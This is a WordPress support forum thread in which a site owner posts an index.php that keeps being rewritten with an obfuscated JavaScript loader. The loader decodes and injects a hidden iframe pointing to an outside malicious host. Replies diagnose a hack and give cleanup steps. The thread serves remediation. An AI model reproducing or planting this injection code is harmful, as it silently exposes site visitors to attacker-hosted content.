Index.php file in root dir keeps changing and disabling site – Hacked?

  • birdfan

    (@birdfan)


    15 years, 9 months ago

    My index.php file in the root dir (WWW) should look like this:
    <?php
    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    require(‘./wp-blog-header.php’);
    ?>

    It Changes by itself every several hours to This:

    <?php<script type=”text/javascript”>
    function CD6384633F353B1396D(B5635AC29A86560115DE03A){function EAD7E4C4E9F091E56D1C9FE34583A5E5(){var EC407A783CF6DB252F7E6CB0A4B6450D=16;return EC407A783CF6DB252F7E6CB0A4B6450D;}return(parseInt(B5635AC29A86560115DE03A,EAD7E4C4E9F091E56D1C9FE34583A5E5()));}function C939DE28B8E5BC28CBBC9D6(A70DE68E59771F46F023A11038E4FE9){function D9D54C05E46CACB4D1406197EADE094D(){return 2;}var AADEE34F9FDF67C2E=””;for(CC4B6642370B181233866=0;CC4B6642370B181233866<A70DE68E59771F46F023A11038E4FE9.length;CC4B6642370B181233866+=D9D54C05E46CACB4D1406197EADE094D()){AADEE34F9FDF67C2E+=(String.fromCharCode(CD6384633F353B1396D(A70DE68E59771F46F023A11038E4FE9.substr(CC4B6642370B181233866,D9D54C05E46CACB4D1406197EADE094D()))));}document.write(AADEE34F9FDF67C2E);}C939DE28B8E5BC28CBBC9D6(“3C696672616D65207372633D22687474703A2F2F6D6172736F686F64696B692E6E65742F6367692D62696E2F696E6465782E6367693F6865726E222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E”);
    </script>

    /* Short and sweet */
    define(‘WP_USE_THEMES’, true);
    require(‘./wp-blog-header.php’);
    ?>

    I have to keep uploading the correct file to keep the site operating. Any suggestions?

Viewing 2 replies - 1 through 2 (of 2 total)
  • whooami

    (@whooami)

    15 years, 9 months ago

    sure, youre hacked. So find the source of the hack. Youre fixing the symptom.

    Mobster

    (@mobster)

    15 years, 9 months ago

    I just repaired a major hacked site myself. It was a complete pain in my ass.

    Look for .htaccess.addHandlerBak or any .htaccess that doesn’t belong there and delete it immediately!

    Because NOONE responded to any of my requests, I will only tell you what I found on my server. As you can see here HERE

    Your file changes look almost identical to mine and the hackers added files throughout my server that mirrored certain files in my directory but added a prefix to the file, Mine was fx_

    Through these files and the .htaccess.addHandlerBak they essentially had overridden my admin privileges and made their own through .htaccess. They also uploaded some sort of admin panel of their own (eval script) I believe, that gave them full reign of my main directory and mysql database as well.

    I would suggest backing up your current theme, database and completely delete ALL current files on your host and uploading a fresh install of WordPress 2.5.1.

    Be sure to double, tipple check your theme for files you don’t recognize and delete those files before uploading to the server. Otherwise it’s a backdoor for them to get back in.

    I also read somewhere to add an index.html file to your plugins directory to prevent hackers from browsing that directory. (A sort of dumb thing for WordPress to leave out in my opinion)

    Browse MySql wp_options / current_plugins for any suspicious looking code that pertains to uploads or .jpg images.

    Check all of your uploads in your current theme for any file you don’t recognize and delete.

    Also, Look here , you might find a few things that help (even though It didn’t help me much)

    Good luck.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Index.php file in root dir keeps changing and disabling site – Hacked?’ is closed to new replies.